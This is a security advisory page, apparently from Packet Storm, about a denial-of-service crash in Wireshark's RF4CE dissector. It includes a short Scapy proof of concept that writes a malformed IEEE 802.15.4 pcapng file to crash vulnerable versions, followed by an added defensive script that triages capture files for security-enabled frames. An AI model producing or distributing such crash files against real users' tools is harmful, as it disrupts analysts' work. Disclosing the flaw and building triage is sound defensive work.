
Wireshark Dissector Crash Denial of Service

05 Mar 2026 | Reported by indoushka | Type: packetstorm | Source: packetstorm.news

RF4CE dissector flaw in Wireshark triggers crash on malformed security frames via crafted pcap file.

=============================================================================================================================================
    | # Title     : Wireshark 4.6.0–4.6.3 4.4.0–4.4.13 RF4CE Profile via Malformed IEEE 802.15.4 Dissector Crash – Denial of Service            |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : https://www.wireshark.org/                                                                                                  |
    =============================================================================================================================================
    
    [+] Summary    :  A vulnerability in the RF4CE Profile protocol dissector of Wireshark versions 4.6.0–4.6.3 and 4.4.0–4.4.13 allows an attacker
                      to trigger a Denial of Service (DoS) condition by supplying a specially crafted IEEE 802.15.4 packet capture file.
                      The flaw exists in the handling of malformed RF4CE security-enabled frames. By manipulating security-related fields
                      and providing inconsistent encrypted payload lengths, the dissector may attempt improper memory operations during
                      decryption processing (notably in CCM security handling routines).
                      This can lead to a segmentation fault and application crash when the malicious .pcapng file is opened
                      in a vulnerable Wireshark version.
                      An attacker can exploit this vulnerability by distributing a malicious capture file, which, when analyzed, causes Wireshark to terminate unexpectedly.
    
    [+] POC   :  
    
    from scapy.all import *
    from scapy.layers.zigbee import *
    
    output_file = "rf4ce_crash_poc.pcapng"
    print(f"[+] Generating Malformed RF4CE Packet to trigger CVE-2026-3203...")
    dot154 = Dot154(fcf_frametype=1, fcf_security=1, fcf_panidcomp=1, seqnum=0x42)
    dot154_addressing = Dot154Data(dest_panid=0x1234, dest_addr=0x0001, src_addr=0x0002)
    rf4ce_nwk = Raw(load=b"\x0c\xff\xff\xff\xff") 
    malformed_security_payload = Raw(load=b"\x01" * 50) 
    pkt = dot154 / dot154_addressing / rf4ce_nwk / malformed_security_payload
    wrpcap(output_file, pkt)
    print(f"[+] File '{output_file}' has been created.")
    print(f"[!] Warning: Opening this file in Wireshark 4.6.0-4.6.3 will cause a CRASH.")
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================
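
For triage on the receiving side, the following added example (not part of the advisory and not Wireshark code) counts the IEEE 802.15.4 frames in a pcap or pcapng file, and how many of them have the MAC Security Enabled bit set (the bit the PoC sets with `fcf_security=1`), without invoking any dissector. The function names, the constructed `SAMPLE` capture and the restriction to link types 195 and 230 are assumptions of this example; it is a pre-open heuristic for routing captures to a patched Wireshark, not a detector for the flaw itself.

```python
import struct

DOT15D4 = {195, 230}  # LINKTYPE_IEEE802_15_4_WITHFCS, LINKTYPE_IEEE802_15_4_NOFCS
PCAP_MAGICS = (b"\xd4\xc3\xb2\xa1", b"\x4d\x3c\xb2\xa1", b"\xa1\xb2\xc3\xd4", b"\xa1\xb2\x3c\x4d")

def sec_bit(frame):
    # Frame Control is little-endian on the wire: bit 3 of byte 0 is Security Enabled.
    return len(frame) >= 2 and bool(frame[0] & 0x08)

def triage(data):
    """Return (802.15.4 frame count, frames with Security Enabled) for pcap/pcapng bytes."""
    total, flagged, magic = 0, 0, data[:4]
    try:
        if magic in PCAP_MAGICS:
            e = "<" if magic[3] == 0xA1 else ">"
            link = struct.unpack_from(e + "I", data, 20)[0] & 0xFFFF
            off = 24
            while off + 16 <= len(data):
                caplen = struct.unpack_from(e + "I", data, off + 8)[0]
                if link in DOT15D4:
                    total += 1
                    flagged += sec_bit(data[off + 16:off + 16 + caplen])
                off += 16 + caplen
        elif magic == b"\x0a\x0d\x0d\x0a":
            e, links, off = "<", [], 0
            while off + 12 <= len(data):
                if data[off:off + 4] == magic:  # Section Header Block resets byte order
                    e = "<" if data[off + 8:off + 12] == b"\x4d\x3c\x2b\x1a" else ">"
                    links = []
                btype, blen = struct.unpack_from(e + "II", data, off)
                if blen < 12 or blen % 4:
                    raise ValueError("corrupt pcapng block length")
                if btype == 1:  # Interface Description Block carries the link type
                    links.append(struct.unpack_from(e + "H", data, off + 8)[0])
                elif btype == 6:  # Enhanced Packet Block: interface id, timestamp, caplen
                    iface, caplen = struct.unpack_from(e + "I8xI", data, off + 8)
                    if iface < len(links) and links[iface] in DOT15D4:
                        total += 1
                        flagged += sec_bit(data[off + 28:off + 28 + caplen])
                off += blen
        else:
            raise ValueError("not a pcap or pcapng file")
    except struct.error as exc:
        raise ValueError("truncated capture file") from exc
    return total, flagged

# Constructed sample: classic pcap, link type 195, two short frames (second has the bit set).
FRAMES = (bytes.fromhex("418801341201000200"), bytes.fromhex("498802341201000200"))
SAMPLE = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 195) + b"".join(
    struct.pack("<IIII", 0, 0, len(f), len(f)) + f for f in FRAMES)
```

A non-zero second value on a host still running one of the affected versions listed in the summary is a reason to open the capture only in a patched build or an isolated analysis VM.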


Vulners AI Score: 6 (Medium risk)
CVSS 3.1: 5.5 - 7.5
EPSS: 0.00026